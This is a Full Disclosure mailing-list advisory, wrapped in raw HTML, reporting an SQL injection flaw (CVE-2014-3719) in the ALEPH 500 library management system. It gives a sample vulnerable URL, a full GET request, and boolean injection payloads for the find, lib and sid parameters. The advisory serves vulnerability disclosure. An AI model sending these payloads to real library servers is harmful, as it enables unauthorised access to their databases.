[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CVE-2014-3719 SQL Injection Vulnerability



<div style="font:14px/1.5 'Lucida Grande', '微软雅黑';color:#333;"><p 
class="ordinary-output target-output"><br></p><p style="margin: 0px; 
line-height: normal; font-family: 'Lucida Grande'; color: rgb(50, 51, 51); 
min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 12px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 15px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida 
Grande';">Greetings:</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">&nbsp; &nbsp; &nbsp; &nbsp;I found on a&nbsp;ALEPH500 
(Integrated library management system) SQL Injection Vulnerability<span 
style="font-family: 'Heiti SC Light';">;</span>CVE-ID is CVE-2014-3719.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Aleph 500,&nbsp;fully meet the&nbsp;industry 
standard,&nbsp;is&nbsp;an art 
class&nbsp;perfect&nbsp;librarysolution,&nbsp;the&nbsp;Ex&nbsp;Libris to pursue 
the&nbsp;essence of philosophy&nbsp;is flexible and easy to 
use.&nbsp;Ex&nbsp;Libris&nbsp;is the world leader in&nbsp;the field&nbsp;of 
Library and information&nbsp;center of&nbsp;development of&nbsp;high 
performance&nbsp;application system.Aleph 500,&nbsp;with Oracle database as 
a&nbsp;background,&nbsp;fully support the Unicodecharacter set,&nbsp;support 
XML&nbsp;management report,&nbsp;and&nbsp;links to other&nbsp;top 
application&nbsp;system of API,&nbsp;is a pioneer in&nbsp;the field of Library 
automation.With more than 20&nbsp;years of development experience,&nbsp;through 
the&nbsp;design of the four generation&nbsp;Aleph system,&nbsp;Ex&nbsp;Libris 
is already&nbsp;in the world&nbsp;won&nbsp;a number of&nbsp;loyal 
customers,&nbsp;at present,&nbsp;there are already more than 1250sets of 
Aleph&nbsp;system was installed in&nbsp;51 countries and regions&nbsp;of 
the&nbsp;libraryand&nbsp;Museum&nbsp;within the coalition.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Software Description</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">=====================</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">The Aleph 500 system is&nbsp;a set of&nbsp;functional 
integrity of the&nbsp;integrated library automation 
system,&nbsp;is&nbsp;Israel's Ex&nbsp;Libris&nbsp;(Eli Beth Co.)&nbsp;developed 
the fifth generation of&nbsp;products.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Vulnerability Description</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">=========================</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Vulnerability title:&nbsp;<span style="color: 
#000000">Multiple Persistent </span>) SQL Injection<span style="color: 
#000000"> </span>ALEPH 500&nbsp;(CVE-2014-3719)</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">CVE: CVE-2014-3719</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Vendor: &nbsp;Israeli Ex Libris (Eli Beth Co.) 
development</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Product: &nbsp;Israeli Ex Libris (Eli Beth Co.) 
development ALEPH500 (Integrated library management system)</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Affected version: 18.1<span style="font-family: 'Heiti 
SC Light';">、</span> 20</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Fixed version: ALEPH 500</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51);"><span style="font-size: 
14px;">Author:&nbsp;</span>Shady.Liu&nbsp;DBAppSecurity Co.Ltd.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">URL: 
http://[domain]/cgi-bin/review_m.cgi?docnum=000421742&amp;getreview=1&amp;lib=BGD01'/**/AND/**/'000Andz'%3d'000</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Andz</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Affected parameter(s): find<span style="font-family: 
'Heiti SC Light';">、</span>lib<span style="font-family: 'Heiti SC 
Light';">、</span>sid</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">HTTP REQUEST</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);"><span style="font-size: 10px;">&nbsp;</span>GET</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 
51);">/cgi-bin/review_m.cgi?docnum=000421742&amp;getreview=1&amp;lib=BGD01'/**/AND/**/'000Andz'%3d'000</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Andz HTTP/1.1</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">X-Requested-With: XMLHttpRequest</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Referer:</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(19, 109, 186);"><a 
href="http://host:8991/F?func=find-m&amp;find_code=WTI&amp;FIND_BASE=BGD09&amp;FIND_BASE=B";>http://host:8991/F?func=find-m&amp;find_code=WTI&amp;FIND_BASE=BGD09&amp;FIND_BASE=B</a></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 
51);">GD01&amp;FIND_BASE=BGD03&amp;FIND_BASE=BGD07&amp;request=</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Host: host:8991</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Connection: Keep-alive</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Accept-Encoding: gzip,deflate</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Replace “find<span style="font-family: 'Heiti SC 
Light';">、</span>lib<span style="font-family: 'Heiti SC Light';">、</span>sid" 
parameter value with&nbsp;“' AND 6012=6012 AND 'SM'='SM”</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51);">Tools used: Mozilla Firefox browser</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande'; 
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51);">Shady.Liu&nbsp;DBAppSecurity 
Co.Ltd.</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 
51);">-------------------------------------------------------------------------</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(19, 109, 186);"><span style="color: 
#323333">Email:<a href="mailto:Shady.liu@xxxxxxxxxxxxxxxxxxxx";><span 
style="color: #136dba">Shady.liu@xxxxxxxxxxxxxxxxxxxx</span></a></span></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family: 
'Lucida Grande'; color: rgb(50, 51, 
51);">----------------------------------------------------------</p></div>
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/